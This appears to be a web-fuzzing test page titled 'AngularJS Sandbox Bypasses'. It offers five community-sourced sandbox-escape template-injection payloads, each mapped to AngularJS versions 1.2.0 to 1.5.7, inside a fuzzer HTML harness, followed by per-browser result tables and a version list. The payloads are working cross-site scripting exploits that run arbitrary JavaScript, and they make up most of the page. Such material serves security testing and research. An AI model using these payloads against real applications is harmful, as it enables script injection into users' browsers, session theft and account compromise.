AngularJS Sandbox Bypasses
Fully working bypasses across different versions curated from the community
By
1
Seen 2861 times
Tags
Run this test now.
Results
Chrome
Firefox
Chrome Mobile
Googlebot
Chromium
Safari
Opera
Tested on
Chrome - 71 - Mac OS X
| Fuzz data |
|---|
| lol |
Tested on
Firefox - 60 - Windows 7
| Fuzz data |
|---|
| lol |
Tested on
Chrome Mobile - 41 - Android
| Fuzz data |
|---|
| lol |
Tested on
Googlebot - 2.1 - undefined
| Fuzz data |
|---|
| lol |
Tested on
Chromium - 56 - Ubuntu
| Fuzz data |
|---|
| lol |
Tested on
Safari - 10.1.2 - Mac OS X
| Fuzz data |
|---|
| lol |
Tested on
Opera - 54 - Windows 10
| Fuzz data |
|---|
| lol |
User Script (FUZZER)
<!DOCTYPE html>
<html>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/***DS_ANGULARJS_VERSIONS***/angular.min.js"></script>
<script>
var ver = '***DS_ANGULARJS_VERSIONS***'.replace(/\./g, '_');
var aVector = ver + " -- a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')";
var bVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
var cVector = ver + " -- c=toString.constructor;p=c.prototype;p.toString=p.call;[\"a\",\"alert(1)\"].sort(c)";
var dVector = ver + " -- (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()";
var eVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
aVector=bVector=cVector=dVector=eVector='lol';
</script>
<body>
<div ng-app="">
// a - Versions 1.3.0 - 1.5.7:
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,addResult(aVector),a')}}
// b - Versions 1.2.20 - 1.2.29:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=bVector),"')}}
// c - Version 1.2.19:
{{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","addResult(cVector)"].sort(c)}}
// d - Versions 1.2.6 - 1.2.18:
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'addResult(dVector)')()}}
// e - Versions 1.2.0 - 1.2.5:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=eVector),"')}}
<p>Input something in the input box:</p>
<p>Name: <input type="text" ng-model="name"></p>
<p ng-bind="name"></p>
</div>
</body>
</html>
Fuzz Data (FUZZER)
var DS_ANGULARJS_VERSIONS = ["1.5.7", "1.5.6", "1.5.5", "1.5.4", "1.5.3", "1.5.2", "1.5.1", "1.5.0", "1.4.12", "1.4.11", "1.4.10", "1.4.9", "1.4.8", "1.4.7", "1.4.6", "1.4.5", "1.4.4", "1.4.3", "1.4.2", "1.4.1", "1.4.0", "1.3.17", "1.3.16", "1.3.15", "1.3.14", "1.3.13", "1.3.12", "1.3.11", "1.3.10", "1.3.9", "1.3.8", "1.3.7", "1.3.6", "1.3.5", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.27", "1.2.26", "1.2.25", "1.2.24", "1.2.23", "1.2.22", "1.2.21", "1.2.20", "1.2.19", "1.2.18", "1.2.17", "1.2.16", "1.2.15", "1.2.14", "1.2.13", "1.2.12", "1.2.11", "1.2.10", "1.2.9", "1.2.8", "1.2.7", "1.2.6", "1.2.5", "1.2.4", "1.2.3", "1.2.2", "1.2.1", "1.2.0", "1.0.8", "1.0.7", "1.0.6", "1.0.5", "1.0.4", "1.0.3", "1.0.2", "1.0.1"];